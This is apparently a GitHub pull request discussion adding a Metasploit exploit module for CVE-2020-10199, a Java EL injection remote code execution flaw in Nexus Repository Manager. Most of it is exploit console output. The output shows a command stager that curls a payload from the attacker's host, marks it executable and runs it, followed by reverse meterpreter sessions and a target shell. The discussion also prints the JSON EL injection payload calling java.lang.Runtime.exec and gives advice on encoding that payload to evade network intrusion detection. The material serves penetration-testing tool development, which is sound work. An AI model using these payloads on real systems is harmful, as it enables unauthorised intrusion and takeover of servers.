Add Nexus Repository Manager Java EL Injection RCE (CVE-2020-10199)

[wvu]

You can read the writeup this module is based on: https://securitylab.github.com/advisories/GHSL-2020-011-nxrm-sonatype.

Any Windows, Linux or Macintosh operating system that can run a supported Java version will work. Other operating systems may work, but they are not tested by Sonatype.

The most widely used operating system for Nexus Repository Manager (NXRM) is Linux and therefore customers should consider it the best tested platform.

https://help.sonatype.com/repomanager3/system-requirements#SystemRequirements-HostOperatingSystem

Currently, Linux is the only supported platform for this module.

To-do

• Investigate pre-auth RCE: https://twitter.com/iamnoooob/status/1246182773427240967
  • Wasn't able to repro pre-auth RCE against any of the recent vulnerable Docker or archived versions, which suggests I may be missing something in the request

Example

msf5 exploit(linux/http/nexus_repo_manager_el_injection) > run

[*] Started reverse TCP handler on 192.168.1.3:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. Nexus 3.21.1-01 is a vulnerable version.
[*] Executing command stager for linux/x64/meterpreter_reverse_tcp
[*] Logging in with admin:admin
[+] Logged in with NXSESSIONID=8b6fd077-1830-4e2b-90e8-2997d260b5c0;
[*] Using URL: http://0.0.0.0:8080/t6NXrxF
[*] Local IP: http://192.168.1.3:8080/t6NXrxF
[*] Generated command stager: ["curl -so /tmp/hgzeytII http://192.168.1.3:8080/t6NXrxF", "chmod +x /tmp/hgzeytII", "/tmp/hgzeytII", "rm -f /tmp/hgzeytII"]
[*] Executing command: curl -so /tmp/hgzeytII http://192.168.1.3:8080/t6NXrxF
[+] Successfully executed command: curl -so /tmp/hgzeytII http://192.168.1.3:8080/t6NXrxF
[*] Client 192.168.1.3 (curl/7.61.1) requested /t6NXrxF
[*] Sending payload to 192.168.1.3 (curl/7.61.1)
[*] Command Stager progress -  50.00% done (54/108 bytes)
[*] Executing command: chmod +x /tmp/hgzeytII
[+] Successfully executed command: chmod +x /tmp/hgzeytII
[*] Command Stager progress -  70.37% done (76/108 bytes)
[*] Executing command: /tmp/hgzeytII
[+] Successfully executed command: /tmp/hgzeytII
[*] Command Stager progress -  82.41% done (89/108 bytes)
[*] Executing command: rm -f /tmp/hgzeytII
[+] Successfully executed command: rm -f /tmp/hgzeytII
[*] Command Stager progress - 100.00% done (108/108 bytes)
[*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.3:53094) at 2020-04-07 19:25:38 -0500
[*] Server stopped.

meterpreter > getuid
Server username: no-user @ 282665c16215 (uid=200, gid=200, euid=200, egid=200)
meterpreter > sysinfo
Computer     : 172.17.0.2
OS           : Red Hat Enterprise Linux 8 (Linux 4.19.76-linuxkit)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

[bcoles]

As this module does not define BadChars it might be a good idea to hard code a base64 decode in Java here, and Base64 encode cmd, presuming there is sufficient space. While Base64 encoding may increase NIDS detection, the use of java.lang.Runtime in combination with getClass and exec is more telling. Optionally, as java.lang.Runtime is a string it could also be base64 encoded, presuming sufficient space.

[wvu]

I didn't notice any badchars, especially with to_json, but that's a valid concern.

[bcoles]

I didn't notice any badchars, especially with to_json, but that's a valid concern.

Presumably use of " will not end well here: exec("#{cmd}")

[wvu]

Yeah, you're right. Looks like it's one level too deep for the to_json escaping:

[1] pry(#<Msf::Modules::Exploit__Linux__Http__Nexus_repo_manager_el_injection::MetasploitModule>)> puts json_payload('echo "hi"')
{"name":"internal","online":true,"storage":{"blobStoreName":"default","strictContentTypeValidation":true},"group":{"memberNames":["${\"\".getClass().forName(\"java.lang.Runtime\").getMethods()[6].invoke(\"\".getClass().forName(\"java.lang.Runtime\")).exec(\"echo \"hi\"\")}"]}}
=> nil
[2] pry(#<Msf::Modules::Exploit__Linux__Http__Nexus_repo_manager_el_injection::MetasploitModule>)>

[bcoles]

Good point, but I was thinking about what happens when the Java code is executed on the server side at both the Java level and the system shell level.

exec("echo pot"ato") will not end well.

[wvu]

I shouldn't even be committing to this PR anymore, but I've still got some time to squeeze. I'll use the last two examples as a lead. Thanks.

[timwr]

Why not ARCH_JAVA?

[wvu]

[wvu]

Funny enough, I'm actually working on a remote classloading exploit right now. So maybe. :P

[wvu]

And https://www.exploit-db.com/docs/english/46303-remote-code-execution-with-el-injection-vulnerabilities.pdf has a potential example:

[wvu]

If you don't want to test the changes to the other modules, that's fine. I've tested them again, all targets.

[gwillcox-r7]

@wvu-r7 Will take a look at this given I'm also looking into the LifeRay PR which is related.

[wvu]

There are a lot of changes in this PR. I apologize. This should not happen in a normal PR, but the changes were related to the work I was doing (such as in #13213), and I couldn't stop myself from making them.

The modules have been retested, so don't feel the need to test everything. Or do!

If you'd like me to explain any changes, feel free to ask!

[wvu]

Miscellaneous module fixes moved to #13259. Cheers!

[gwillcox-r7]

@wvu-r7 Overall looking very good, a few areas to fix up as it seems some extra code was left in there and I wanted some clarification on a few things, then should be able to retest it and merge.

[wvu]

@gwillcox-r7: This is how it should look with VERBOSE unset.

msf5 exploit(linux/http/nexus_repo_manager_el_injection) > run

[*] Started reverse TCP handler on 192.168.1.3:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. Nexus 3.21.1-01 is a vulnerable version.
[*] Executing command stager for linux/x64/meterpreter_reverse_tcp
[*] Logging in with admin:admin
[+] Logged in with NXSESSIONID=547a9664-8d8b-43cb-bf7d-e6c30e71c75d;
[*] Using URL: http://0.0.0.0:8080/TI0jO3EebzZ
[*] Local IP: http://192.168.1.3:8080/TI0jO3EebzZ
[+] Successfully executed command: curl -so /tmp/AsZIBdaY http://192.168.1.3:8080/TI0jO3EebzZ
[*] Client 192.168.1.3 (curl/7.61.1) requested /TI0jO3EebzZ
[*] Sending payload to 192.168.1.3 (curl/7.61.1)
[*] Command Stager progress -  51.79% done (58/112 bytes)
[+] Successfully executed command: chmod +x /tmp/AsZIBdaY
[*] Command Stager progress -  71.43% done (80/112 bytes)
[+] Successfully executed command: /tmp/AsZIBdaY
[*] Command Stager progress -  83.04% done (93/112 bytes)
[*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.3:62148) at 2020-04-15 18:10:14 -0500
[+] Successfully executed command: rm -f /tmp/AsZIBdaY
[*] Command Stager progress - 100.00% done (112/112 bytes)
[*] Server stopped.

meterpreter >

I'm running into some issues disabling VERBOSE, though, since it's being stored as a string. Seems like a resurgence of #10179/#10240. I had to change the value in Pry. :/ @adfoster-r7

[gwillcox-r7]

@gwillcox-r7: This is how it should look with VERBOSE unset.

msf5 exploit(linux/http/nexus_repo_manager_el_injection) > run

[*] Started reverse TCP handler on 192.168.1.3:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. Nexus 3.21.1-01 is a vulnerable version.
[*] Executing command stager for linux/x64/meterpreter_reverse_tcp
[*] Logging in with admin:admin
[+] Logged in with NXSESSIONID=547a9664-8d8b-43cb-bf7d-e6c30e71c75d;
[*] Using URL: http://0.0.0.0:8080/TI0jO3EebzZ
[*] Local IP: http://192.168.1.3:8080/TI0jO3EebzZ
[+] Successfully executed command: curl -so /tmp/AsZIBdaY http://192.168.1.3:8080/TI0jO3EebzZ
[*] Client 192.168.1.3 (curl/7.61.1) requested /TI0jO3EebzZ
[*] Sending payload to 192.168.1.3 (curl/7.61.1)
[*] Command Stager progress -  51.79% done (58/112 bytes)
[+] Successfully executed command: chmod +x /tmp/AsZIBdaY
[*] Command Stager progress -  71.43% done (80/112 bytes)
[+] Successfully executed command: /tmp/AsZIBdaY
[*] Command Stager progress -  83.04% done (93/112 bytes)
[*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.3:62148) at 2020-04-15 18:10:14 -0500
[+] Successfully executed command: rm -f /tmp/AsZIBdaY
[*] Command Stager progress - 100.00% done (112/112 bytes)
[*] Server stopped.

meterpreter >

I'm running into some issues disabling VERBOSE, though, since it's being stored as a string. Seems like a resurgence of #10179/#10240. I had to change the value in Pry. :/ @adfoster-r7

Hmm odd this looks exactly the same as the output above, so not seeing what VERBOSE is adding? Unless thats the point of the example?

[wvu]

Oh, it's different. It's less verbose. :P

[gwillcox-r7]

Confirmed that this exploit works and setup instructions are correct:

msf5 > use exploit/linux/http/nexus_repo_manager_el_injection 
msf5 exploit(linux/http/nexus_repo_manager_el_injection) > show options

Module options (exploit/linux/http/nexus_repo_manager_el_injection):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   admin            yes       Nexus password
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      8081             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       Base path
   URIPATH                     no        The URI to use for this exploit (default is random)
   USERNAME   admin            yes       Nexus username
   VHOST                       no        HTTP server virtual host


Payload options (linux/x64/meterpreter_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Nexus Repository Manager <= 3.21.1


msf5 exploit(linux/http/nexus_repo_manager_el_injection) > set LHOST 192.168.1.124
LHOST => 192.168.1.124
msf5 exploit(linux/http/nexus_repo_manager_el_injection) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf5 exploit(linux/http/nexus_repo_manager_el_injection) > exploit

[*] Started reverse TCP handler on 192.168.1.124:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. Nexus 3.21.1-01 is a vulnerable version.
[*] Executing command stager for linux/x64/meterpreter_reverse_tcp
[*] Logging in with admin:admin
[+] Logged in with NXSESSIONID=3b13e129-1044-4012-9196-5a94d5f9cd68;
[*] Using URL: http://0.0.0.0:8080/QUg9CbPGd5
[*] Local IP: http://192.168.1.124:8080/QUg9CbPGd5
[*] Client 192.168.1.124 (curl/7.61.1) requested /QUg9CbPGd5
[*] Sending payload to 192.168.1.124 (curl/7.61.1)
[+] Successfully executed command: curl -so /tmp/nVmWGeTu http://192.168.1.124:8080/QUg9CbPGd5
[*] Command Stager progress -  52.21% done (59/113 bytes)
[+] Successfully executed command: chmod +x /tmp/nVmWGeTu
[*] Command Stager progress -  71.68% done (81/113 bytes)
[+] Successfully executed command: /tmp/nVmWGeTu
[*] Command Stager progress -  83.19% done (94/113 bytes)
[+] Successfully executed command: rm -f /tmp/nVmWGeTu
[*] Meterpreter session 1 opened (192.168.1.124:4444 -> 192.168.1.124:56005) at 2020-04-15 18:51:09 -0500
[*] Command Stager progress - 100.00% done (113/113 bytes)
[*] Server stopped.

meterpreter > getuid
Server username: no-user @ 905978a0c662 (uid=200, gid=200, euid=200, egid=200)
meterpreter > shell
Process 465 created.
Channel 1 created.
pwd
/opt/sonatype/nexus
ls
NOTICE.txt
OSS-LICENSE.txt
PRO-LICENSE.txt
bin
deploy
etc
lib
public
system

[gwillcox-r7]

Looks good, changes approved :)

[gwillcox-r7]

Release Notes

A new module, modules/exploits/linux/http/nexus_repo_manager_el_injection
was added that exploits CVE-2020-10199, an authenticated Java EL Injection RCE in Nexus Repository Manager 3.x for versions 3.21.1 and prior. Successful exploitation results in RCE as the user nexus.